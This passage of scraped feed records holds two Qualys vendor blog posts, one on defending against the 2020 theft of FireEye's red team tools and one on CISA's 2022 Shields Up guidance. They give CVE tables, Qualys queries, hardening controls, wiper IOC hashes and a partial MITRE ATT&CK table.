some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. 
They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. 
To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. 
\n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop 
Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for the CVEs published by FireEye. You can search for these QIDs in the VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith the VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. 
\n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 
'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. 
Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools, you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) deploys only the right patch to the right asset: the Qualys patch job maps each patch to the matching assets (so you don\u2019t have to) in terms of binary architecture, OS version, etc. In addition, if a patch is not needed by a specific asset, the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch Assets tab in order to see all the assets that are missing at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. 
These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. 
\n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. 
This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a government\u2019s response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. 
We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys recommends that all organizations take the following actionable steps to adopt a heightened cybersecurity posture and protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of its potential attack surface. Cyber threat actors continuously scan the internet for vulnerable systems to target with attacks and campaigns. Often attackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. 
Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detect services on each port. Qualys CSAM supports an extensive query language that enables teams to report and act on detected external-facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. 
CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR monitors endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus, such as Living-off-the-Land attacks, as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys researchers analyzed all 300+ CVEs in the CISA Known Exploited Vulnerabilities catalog and mapped them to Qualys QIDs. Many of these CVEs have had patches available for several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerability reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. 
\n\nThe following are some of the critical vulnerabilities cataloged by CISA that are specifically known to be exploited by Russian state-sponsored APT actors for initial access:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored 
actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create patch and configuration-fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities, downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed, including new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software is always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk it poses. Prioritize your remediation efforts based on the software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. 
\n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 is the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations\n\nProtect your public cloud infrastructure by securing the following services as a priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.).\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with any admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. 
This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. 
In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, 
CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance 
[[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell 